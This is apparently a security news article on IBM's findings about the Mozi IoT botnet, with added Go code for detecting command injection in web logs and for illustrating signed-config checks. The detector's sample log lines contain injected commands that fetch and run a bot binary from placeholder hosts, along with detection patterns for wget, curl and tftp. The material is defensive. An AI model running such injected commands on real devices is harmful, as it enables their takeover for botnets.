Mozi Botnet Has Fueled a Significant Increase in Internet of Things Attacks: IBM


Mozi, a relatively recent botnet, has driven a major rise in botnet activity across the Internet of Things (IoT), IBM announced this week.

Mozi has been extremely successful over the past year, accounting for 90 percent of the IoT network traffic detected between October 2019 and June 2020. It shares features with Mirai and its variants and reuses Gafgyt data, although it does not attempt to remove competing malware from infected networks, IBM researchers report.

However, the sharp rise in IoT attacks could also stem from the growing number of IoT devices available worldwide, which widens the attack surface. According to IBM, there are currently about 31 billion IoT devices worldwide, with about 127 new devices deployed every second.

IBM indicates that Mozi's effectiveness rests on Command Injection (CMDi) attacks that rely on IoT interface misconfigurations. The expanded use of IoT, inadequate setup procedures, and the growth in remote work attributed to COVID-19 are suspected to be responsible for the spikes.

Almost all of the attacks observed against IoT devices used CMDi for initial entry. Mozi leverages CMDi to run a “wget” shell command and then tampers with file permissions so that the attackers can interact with the affected device.
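The two-step pattern described above (an injected shell command that fetches a file, followed by a permission change) is what a defender can look for in web-interface access logs. The following Go program is an added example written for this page, not IBM's or any vendor's tooling: it parses a handful of constructed combined-log-format lines (the addresses, paths and the `example.invalid` host are placeholders) and flags query parameters whose decoded value combines a shell metacharacter with a download or permission-changing tool.

```go
package main

import (
	"fmt"
	"net/url"
	"regexp"
)

// Finding records one suspicious parameter value seen in a request line.
type Finding struct {
	Client string // source address from the log line
	Param  string // query parameter carrying the payload
	Value  string // decoded parameter value
	Reason string
}

// sampleLogLines are constructed combined-log-format lines for this example; they are not
// real traffic and the addresses and host names are placeholders.
var sampleLogLines = []string{
	`10.0.0.5 - - [12/Sep/2020:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"`,
	`10.0.0.9 - - [12/Sep/2020:10:01:07 +0000] "POST /setup.cgi?todo=syscmd&cmd=cd+%2Ftmp%3Bwget+http%3A%2F%2Fexample.invalid%2Fmozi.a%3Bchmod+777+mozi.a%3B.%2Fmozi.a HTTP/1.1" 200 0 "-" "-"`,
	`10.0.0.7 - - [12/Sep/2020:10:02:11 +0000] "GET /search?q=wget+tutorial HTTP/1.1" 200 1024 "-" "Mozilla/5.0"`,
	`10.0.0.3 - - [12/Sep/2020:10:03:30 +0000] "GET /cgi-bin/status?dev=eth0%7Ctftp+-g+-r+bot.mips+203.0.113.9 HTTP/1.1" 200 77 "-" "curl/7.68.0"`,
}

// requestLineRe pulls the client address, method and request target out of a combined-log line.
var requestLineRe = regexp.MustCompile(`^(\S+) \S+ \S+ \[[^\]]+\] "([A-Z]+) (\S+) HTTP/[0-9.]+"`)

// shellMetaRe matches the characters that chain or substitute commands in a POSIX shell.
var shellMetaRe = regexp.MustCompile("[;|&`]|\\$\\(")

// toolRe matches the fetch-and-run tools that typically follow a successful injection.
var toolRe = regexp.MustCompile(`(?i)\b(wget|curl|tftp|ftpget|chmod|busybox)\b`)

// DetectCMDi scans access-log lines and flags query parameters whose decoded value combines a
// shell metacharacter with a download or permission-changing tool. Either signal alone is
// noisy (a search for "wget tutorial" is benign); together they are a strong indicator.
func DetectCMDi(lines []string) []Finding {
	var findings []Finding
	for _, line := range lines {
		m := requestLineRe.FindStringSubmatch(line)
		if m == nil {
			continue
		}
		client, target := m[1], m[3]
		u, err := url.Parse(target)
		if err != nil {
			continue
		}
		// Query() percent-decodes values and turns '+' into spaces, so the check runs on
		// what the device's CGI handler would actually see.
		for param, values := range u.Query() {
			for _, v := range values {
				if shellMetaRe.MatchString(v) && toolRe.MatchString(v) {
					findings = append(findings, Finding{
						Client: client,
						Param:  param,
						Value:  v,
						Reason: "shell metacharacter combined with download/permission tool",
					})
				}
			}
		}
	}
	return findings
}

func main() {
	for _, f := range DetectCMDi(sampleLogLines) {
		fmt.Printf("%s param=%q value=%q (%s)\n", f.Client, f.Param, f.Value, f.Reason)
	}
}
```

On the sample input, the `setup.cgi` line and the `status?dev=` line are flagged while the benign search query is not. The check only inspects query parameters; a production version would also decode the path and POST bodies, since injection points on embedded web interfaces appear in all three.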

A file named “mozi.a” is downloaded and executed on compromised devices running the MIPS architecture. MIPS is a reduced instruction set computer (RISC) instruction set architecture, and code running on it gives an attacker the ability to modify the firmware and plant additional malware.

The exploits in Mozi's arsenal include:

- CVE-2017-17215 (Huawei HG532)
- CVE-2018-10561 / CVE-2018-10562 (GPON routers)
- CVE-2014-8361 (Realtek SDK)
- CVE-2008-4873 (Sepal SPBOARD)
- CVE-2016-6277 (Netgear R7000 / R6400)
- CVE-2015-2051 (D-Link devices)
- Eir D1000 wireless router injection
- Netgear setup.cgi unauthenticated RCE
- MVPower DVR
- D-Link UPnP SOAP command

The threat, which relies on a predominantly China-based infrastructure (84%), is also capable of brute-forcing Telnet passwords and uses a hardcoded credential list to do so.

“Mozi botnet is a peer-to-peer (P2P) botnet based on the distributed sloppy hash table (DSHT) protocol, which can propagate by exploits of IoT devices and weak telnet passwords,” says IBM.

To verify its own authenticity, the malware uses ECDSA384 (elliptic curve digital signature algorithm, 384-bit) and includes a series of hardcoded public DHT nodes through which it joins the P2P network.
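The point of the ECDSA384 check is that a node applies a configuration received from a peer only if it carries a signature made with the operator's private key, so a defender cannot simply push a rogue configuration into the DHT. The Go program below is an added illustration of that signed-config pattern; it is not Mozi's code, the function names are hypothetical, and the config blob and its fields are constructed placeholders (Mozi's actual format, key and wire encoding are not described on this page). It uses the standard library's P-384 curve with a SHA-384 digest, which is what "ECDSA384" denotes in general.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/sha512"
	"fmt"
)

// NewConfigSigningKey generates a P-384 key pair. In a real botnet only the operator holds
// the private half; the public half is what gets hardcoded into every bot.
func NewConfigSigningKey() (*ecdsa.PrivateKey, error) {
	return ecdsa.GenerateKey(elliptic.P384(), rand.Reader)
}

// SignConfig hashes the config with SHA-384 and produces an ASN.1-encoded ECDSA signature.
func SignConfig(priv *ecdsa.PrivateKey, config []byte) ([]byte, error) {
	digest := sha512.Sum384(config)
	return ecdsa.SignASN1(rand.Reader, priv, digest[:])
}

// AcceptPeerConfig is the check a node runs on a config it received from a peer: the config
// is applied only if the signature verifies under the hardcoded (trusted) public key.
func AcceptPeerConfig(trusted *ecdsa.PublicKey, config, sig []byte) bool {
	digest := sha512.Sum384(config)
	return ecdsa.VerifyASN1(trusted, digest[:], sig)
}

func main() {
	priv, err := NewConfigSigningKey()
	if err != nil {
		panic(err)
	}
	// Constructed config blob; the fields are placeholders, not Mozi's real format.
	config := []byte("ver=1;dip=203.0.113.5;count=1")
	sig, err := SignConfig(priv, config)
	if err != nil {
		panic(err)
	}
	fmt.Println("genuine config accepted:", AcceptPeerConfig(&priv.PublicKey, config, sig))

	// A peer that alters the config but reuses the old signature is rejected.
	forged := []byte("ver=1;dip=198.51.100.7;count=1")
	fmt.Println("forged config accepted:", AcceptPeerConfig(&priv.PublicKey, forged, sig))
}
```

Because the public key is baked into the bot, a tampered config or one signed with any other key fails verification. For defenders this means disruption generally comes from blocking or monitoring the network contact to the hardcoded DHT bootstrap nodes and from patching the entry points, not from interfering with the configuration channel itself.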

The botnet can be used to conduct distributed denial-of-service (DDoS) attacks (HTTP, TCP, UDP), to execute commands, to download and execute additional payloads, and to collect information about the bot.

“As newer botnet groups like Mozi scale up operations and overall IoT activity surges, companies using IoT devices need to be aware of the threat that is emerging,” the report says. IBM is seeing corporate IoT devices increasingly under attackers’ fire. The primary attack vector of choice for threat actors remains command injection, which reiterates how necessary it is to change default system settings and use rigorous penetration tests to identify and repair security holes, IBM concludes.

Mark Funk
Mark Funk is an experienced information security specialist who works with enterprises to mature and improve their enterprise security programs. Previously, he worked as a security news reporter.